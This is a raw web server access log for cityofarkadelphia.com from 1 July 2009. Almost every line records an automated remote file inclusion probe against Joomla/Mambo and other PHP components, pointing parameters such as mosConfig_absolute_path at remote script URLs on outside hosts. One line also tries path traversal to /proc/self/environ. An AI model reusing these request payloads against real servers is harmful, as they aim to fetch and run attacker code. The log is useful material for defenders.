83.16.182.130 - - [01/Jul/2009:05:35:09 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:05:35:09 -0700] "GET /logs/access_080330.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:18 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:18 -0700] "GET /logs/access_080531.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:18 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:18 -0700] "GET /logs/access_080531.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:18 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:19 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:19 -0700] "GET /logs/access_080531.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:21 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:21 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:21 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:26 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:26 -0700] "GET /logs/access.log%20%20/errors.php?error=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:35:32 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:32 -0700] "GET /logs/access_080531.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:32 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:34 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:35:36 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:35:36 -0700] "GET /logs/access_080531.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:40 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:51 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:51 -0700] "GET /logs/access_080531.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:35:52 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:36:08 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:36:27 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:36:29 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:36:44 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:37:04 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.157.45.177 - - [01/Jul/2009:05:37:13 -0700] "GET /logs/access.log/index1.php?=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:37:55 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:37:58 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:37:58 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:05:38:28 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:05:38:30 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:05:38:30 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:05:38:30 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:38:39 -0700] "GET /logs/access_080330.log///vwar/backup/errors.php?error=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:05:38:40 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:05:38:40 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:05:38:40 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:05:38:40 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:05:38:45 -0700] "GET /index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:05:38:45 -0700] "GET /logs/access.log/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.188.112.35 - - [01/Jul/2009:05:38:46 -0700] "GET /logs/index.php?dir=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:39:16 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:40:09 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:40:27 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:40:35 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:40:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:40:35 -0700] "GET /logs/access_080531.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:40:56 -0700] "GET /logs/access_080601.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:41:04 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:41:09 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:41:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:41:09 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:41:31 -0700] "GET /logs/access_080531.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:41:31 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:41:31 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:41:44 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:42:17 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:42:17 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:42:29 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:42:42 -0700] "GET /logs/access_080531.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:42:52 -0700] "GET /logs/access_080601.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:43:08 -0700] "GET /bbs/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:43:38 -0700] "GET /logs/access_080531.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:05:43:44 -0700] "GET /logs/access_080601.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:43:49 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:44:00 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:44:00 -0700] "GET /logs/access_080531.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:44:03 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:44:09 -0700] "GET /logs/access.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:44:11 -0700] "GET //vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:44:33 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
84.18.198.72 - - [01/Jul/2009:05:45:14 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
84.18.198.72 - - [01/Jul/2009:05:45:14 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=none? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:45:17 -0700] "GET /logs/access_080330.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:46:59 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:47:00 -0700] "GET /?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 200 917 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:47:01 -0700] "GET /?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 200 917 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:47:01 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:47:02 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 200 4232 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:47:02 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 200 4232 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:47:08 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:47:09 -0700] "GET /?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 200 917 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:47:09 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 200 4232 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:47:13 -0700] "GET /include/mail.inc.php?skin_board_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:47:25 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:48:05 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:48:09 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:48:11 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:48:18 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:48:31 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:48:31 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:48:31 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.98.5 - - [01/Jul/2009:05:48:34 -0700] "GET //vwar/backup/errors.php?error=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
198.64.149.93 - - [01/Jul/2009:05:48:34 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.mommytalk.com//css/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:50:36 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:05:50:39 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:05:51:12 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:05:52:29 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:05:52:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:05:52:31 -0700] "GET /logs/access.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:05:52:31 -0700] "GET /logs/access_080531.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:05:52:39 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:05:52:39 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.191.37.60 - - [01/Jul/2009:05:52:43 -0700] "GET /logs/access_080531.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:52:52 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:52:52 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:05:52:52 -0700] "GET /logs/access_080330.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
